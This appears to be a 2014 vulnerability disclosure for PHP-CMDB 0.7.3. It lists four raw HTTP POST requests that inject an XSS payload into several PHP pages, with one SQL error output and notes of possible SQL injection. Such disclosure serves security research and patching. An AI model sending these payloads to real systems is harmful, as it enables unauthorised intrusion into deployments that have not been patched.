# ============================================================== # Title ...| Multiple vulnerabilities in PHP-CMDB # Version .| php-cmdb_0.7.3 # Date ....| 27.02.2014 # Found ...| HauntIT Blog # Home ....| # ============================================================== [+] From admin logged-in # ============================================================== # 1. XSS in SQL error ------ POST /k/cms/php-cmdb/php-cmdb_0.7.3/www/index.php HTTP/1.1 Host: 10.149.14.62 (...) Content-Length: 57 s_text='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&s_form=1 ------ ------ You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '">%' AND ci_cit_id=cit_id ORDER BY ci_title, cit_title' at line 1 ------ Same parameter seems to be vulnerable to SQL Injection attack. ("The used SELECT statements have a different number of columns") # ============================================================== # 2. XSS ------ POST /k/cms/php-cmdb/php-cmdb_0.7.3/www/ci_create.php HTTP/1.1 Host: 10.149.14.62 (...) Content-Length: 93 ci_id=0&ci_clone_id=0&ci_icon='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&ci_form=1&ci_cit_id=0 ------ # ============================================================== # 3. XSS /SQLi ------ POST /k/cms/php-cmdb/php-cmdb_0.7.3/www/search_advanced.php HTTP/1.1 Host: 10.149.14.62 (...) Content-Length: 100 s_form=2&s_text='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&s_cit_id=0&s_cat_id=0&s_compare_operator=0 ------ # ============================================================== # 4. XSS / SQLi ------ POST /k/cms/php-cmdb/php-cmdb_0.7.3/www/u_create_run.php HTTP/1.1 Host: 10.149.14.62 (...) Content-Length: 153 u_id=0&u_form=1&u_login='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&u_active=1&u_last_name=tester&u_first_name=tester&u_role_id=1&u_email=&u_auth_backend=0 ------ # ============================================================== # More @ http://HauntIT.blogspot.com # Thanks! ;) # o/